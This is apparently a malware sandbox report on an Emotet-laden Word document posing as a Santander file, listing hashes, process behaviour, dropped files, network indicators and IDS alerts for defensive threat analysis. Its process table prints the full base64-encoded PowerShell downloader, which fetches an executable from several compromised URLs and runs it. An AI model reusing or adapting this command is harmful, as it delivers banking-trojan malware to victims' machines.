analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Santander 647029181956034.doc

Full analysis: https://app.any.run/tasks/540f5251-5fcf-437e-a2d5-eabe90fea4a2
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: September 19, 2019, 07:52:04
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
loader
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Regional, Subject: Handcrafted Fresh Towels, Author: Adrien Kerluke, Comments: connecting, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Sep 18 07:25:00 2019, Last Saved Time/Date: Wed Sep 18 07:25:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0
MD5:

F0AB32AC984C16136C246B4450531004

SHA1:

9DAC64E6C476863270950FEBA8AEBCD2FD7F917E

SHA256:

3ACB42E4066650B1D76E471C01DBAB1038D649972F4BD9FC2F80E2D4363A3A42

SSDEEP:

6144:sNqTwyusD0F/rbS3+c2xYbP/g9XWuPLkIi7NSU4jJntATfDHl6Ml:sNqTwyusD0F/rbS3+cMYbP/g9XWMXi7n

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 523.exe (PID: 2256)
      • 523.exe (PID: 3652)
      • 523.exe (PID: 3544)
      • 523.exe (PID: 2448)
      • easywindow.exe (PID: 2840)
      • easywindow.exe (PID: 3700)
      • easywindow.exe (PID: 2076)
      • easywindow.exe (PID: 3888)
    • Emotet process was detected

      • 523.exe (PID: 2448)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3928)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3928)
    • Executed via WMI

      • powershell.exe (PID: 3928)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3928)
      • 523.exe (PID: 2448)
    • PowerShell script executed

      • powershell.exe (PID: 3928)
    • Starts itself from another location

      • 523.exe (PID: 2448)
    • Application launched itself

      • easywindow.exe (PID: 2076)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2988)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2988)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: Regional
Subject: Handcrafted Fresh Towels
Author: Adrien Kerluke
Keywords: -
Comments: connecting
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:09:18 06:25:00
ModifyDate: 2019:09:18 06:25:00
Pages: 1
Words: 95
Characters: 547
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Conroy Group
Lines: 4
Paragraphs: 1
CharCountWithSpaces: 641
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: Harber
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
44
Monitored processes
10
Malicious processes
4
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 523.exe no specs 523.exe no specs 523.exe no specs #EMOTET 523.exe easywindow.exe no specs easywindow.exe no specs easywindow.exe no specs easywindow.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2988"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Santander 647029181956034.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3928powershell -encod JABEAEkAaQBNAE0AdwBkAFAAPQAnAHAAdwA3ADkAVQBWADUATgAnADsAJAByADgAOQBCAHEAdgA5AE0AIAA9ACAAJwA1ADIAMwAnADsAJAB6ADEAbwBaAGkARABqAD0AJwBPAGwAXwBxAG0ARQBDACcAOwAkAEwAagA2AEoAbABMAEgAegA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAcgA4ADkAQgBxAHYAOQBNACsAJwAuAGUAeABlACcAOwAkAHEAdAA0AEUAbgA2AEQAQgA9ACcAUgAzAHYAcQBpAFMARgBUACcAOwAkAEMAaQBJAEwAawBIAFUAbwA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBlAFQALgB3AEUAYgBDAEwASQBFAE4AdAA7ACQAcQBXAEcAXwBqAHoAWgBWAD0AJwBoAHQAdABwADoALwAvAHMAaABhAGUAbAAuAG8AcgBnAC8AaABvAHMAdABpAG4AZwAvAFQAWQBYAGMAaABjAEsAawBIAHoALwBAAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBsAG8AdAB0AGkAegB6AGEAegBpAG8AbgBlAHMAYQB2AGEAcgByAGEALgBpAHQALwB3AHAALQBhAGQAbQBpAG4ALwB6AE0AaQBmAFoARABQAHUAcgAvAEAAaAB0AHQAcABzADoALwAvAGgAZQByAHIAZQBuAG0AbwBkAGUALgB0AGsALwA1AHUAcwBxAGoAbABlAHcALwB0AHQAZwAyADIAegBjAGYAXwBxADUAYwBoAG8AdgAtADMANwA3ADIAMQA1AC8AQABoAHQAdABwADoALwAvAG4AZgBiAGkAbwAuAGMAbwBtAC8AaQBtAGcALwB1AHAAbABvAGEAZABfAEkAbQBhAGcAZQAvAGUAZABtAC8AcABpAGMAXwAyAC8AdQA2AHEANAB1AGMAcQA3AF8AaAB5AGcAOAB1AHoAaABoAC0AMwA2ADkAOQA2ADMANQA1ADkALwBAAGgAdAB0AHAAOgAvAC8AZQBuAGQAbwBmAGgAaQBzAHIAbwBwAGUALgBuAGUAdAAvADIAMAAwADgALQAwADgAXwBQAFMAQgBlAGEAcgBEAG8AbgBhAHQAZQAvAHEAbQBpAHUATwBaAHYARABqAC8AJwAuACIAUwBwAGAATABpAFQAIgAoACcAQAAnACkAOwAkAGwAdAA1AHIARQBwAE0AegA9ACcATgBUAE0AUABzAEYAaQAnADsAZgBvAHIAZQBhAGMAaAAoACQAQQBrAE8AWgBQAHoAVwAgAGkAbgAgACQAcQBXAEcAXwBqAHoAWgBWACkAewB0AHIAeQB7ACQAQwBpAEkATABrAEgAVQBvAC4AIgBkAE8AYAB3AGAATgBsAGAAbwBBAGQAZgBpAGwAZQAiACgAJABBAGsATwBaAFAAegBXACwAIAAkAEwAagA2AEoAbABMAEgAegApADsAJABsAFcAZABEADQATwA9ACcAdgBiAFgAaAB3AE0ANgAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQAnACsAJwB0AGUAbQAnACkAIAAkAEwAagA2AEoAbABMAEgAegApAC4AIgBMAGAAZQBOAGcAVABIACIAIAAtAGcAZQAgADIANAA4ADEANAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYQBgAFIAdAAiACgAJABMAGoANgBKAGwATABIAHoAKQA7ACQASwBfADAAdABRAHcAbwBiAD0AJwBhADkAZAB2AEsARwBHAGIAJwA7AGIAcgBlAGEAawA7ACQAQgBjAFIASABSAFYANAA9ACcARgBTAEEAbQBSAFYANgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABFAHIAWgBjAE4ASAA9ACcAdwBuAFcAcQBGAGQAXwBhACcAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2256"C:\Users\admin\523.exe" C:\Users\admin\523.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3544"C:\Users\admin\523.exe" C:\Users\admin\523.exe523.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3652--d05e77b4C:\Users\admin\523.exe523.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2448--d05e77b4C:\Users\admin\523.exe
523.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3888"C:\Users\admin\AppData\Local\easywindow\easywindow.exe"C:\Users\admin\AppData\Local\easywindow\easywindow.exe523.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2840"C:\Users\admin\AppData\Local\easywindow\easywindow.exe"C:\Users\admin\AppData\Local\easywindow\easywindow.exeeasywindow.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2076--fd47f3b8C:\Users\admin\AppData\Local\easywindow\easywindow.exeeasywindow.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3700--fd47f3b8C:\Users\admin\AppData\Local\easywindow\easywindow.exeeasywindow.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
1 730
Read events
1 263
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
10
Text files
0
Unknown types
43

Dropped files

PID
Process
Filename
Type
2988WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA240.tmp.cvr
MD5:
SHA256:
2988WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:411AA551C7B8A1B9F32760ED45D0BE42
SHA256:47D0579D4D67627079300B4790949335FEFFD22740AA047AAA0FDAC3A6CAE910
2988WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1393EF8B.wmfwmf
MD5:153F42F84A2C3839CC8BBBF9AA5BCFBA
SHA256:17F557BE0DD6153CFA6E693F575EFC5B692360791ACF80548E3CD7E00845AEE7
2988WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\54878C10.wmfwmf
MD5:D380A71A1B03203B26489F70EB320A64
SHA256:DD06DE5BAC74F5593922EC5CF92F079655914BED2F2F755F1C91FD8324F6FA2E
2988WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FA407CD1.wmfwmf
MD5:F1401EB17BC73F6A3602365B218541ED
SHA256:38EF5B80CAC6C3FD4E0C4F48C9365714F83B5FFA0E1058AA01F097857EE8ED57
2988WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\18768734.wmfwmf
MD5:5F0EE752E9B7B678CA04ED19A7D1C088
SHA256:A75B8CBE4B2813CE89384C551D4F677A55D25E418B89192363FEFEAF6FADF269
2988WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\227DB768.wmfwmf
MD5:B118EDD7631B6E67EA31B12533DE9F05
SHA256:21F0B4277140EFE127BB4CDF120A485B751DB816280FE3F2CC973D9434EAACBC
2988WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\976A9C9E.wmfwmf
MD5:471CAE0A8DBA69FE95345531EF1B0ECA
SHA256:BEFDF361E8F16DA86351089B70243C643C3ED649D077433F861917E55C0AAB83
2988WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BA53925C.wmfwmf
MD5:13F48702314854E6F39B1A7007C95DF0
SHA256:EA6F3677BD7CB018C8D2709254DE4EAD255420ACBD66132DF1202485C4DCC1B8
2988WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:8357DFA23F7B200002362A65117BC4F3
SHA256:9ECBE9B8BB8B32FC1E2281E7FA0A52813797684754FF2AB1D2172DD2E7ABA1B8
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
6
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3928
powershell.exe
GET
404
89.46.105.48:80
http://www.lottizzazionesavarra.it/wp-admin/zMifZDPur/
IT
html
217 b
suspicious
3928
powershell.exe
GET
200
124.150.132.29:80
http://nfbio.com/img/upload_Image/edm/pic_2/u6q4ucq7_hyg8uzhh-369963559/
TW
executable
384 Kb
suspicious
3928
powershell.exe
GET
200
156.67.209.58:80
http://shael.org/cgi-sys/suspendedpage.cgi
SG
html
7.40 Kb
malicious
3928
powershell.exe
GET
302
156.67.209.58:80
http://shael.org/hosting/TYXchcKkHz/
SG
html
681 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3928
powershell.exe
89.46.105.48:80
www.lottizzazionesavarra.it
Aruba S.p.A.
IT
suspicious
3928
powershell.exe
156.67.209.58:80
shael.org
Hostinger International Limited
SG
unknown
3928
powershell.exe
178.63.20.162:443
herrenmode.tk
Hetzner Online GmbH
DE
suspicious
3928
powershell.exe
124.150.132.29:80
nfbio.com
PUMO NETWORK DIGITAL TECHNOLOGY CO.,LTD
TW
suspicious

DNS requests

Domain
IP
Reputation
shael.org
  • 156.67.209.58
malicious
www.lottizzazionesavarra.it
  • 89.46.105.48
suspicious
herrenmode.tk
  • 178.63.20.162
suspicious
nfbio.com
  • 124.150.132.29
suspicious

Threats

PID
Process
Class
Message
Potentially Bad Traffic
ET DNS Query to a .tk domain - Likely Hostile
3928
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3928
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3928
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info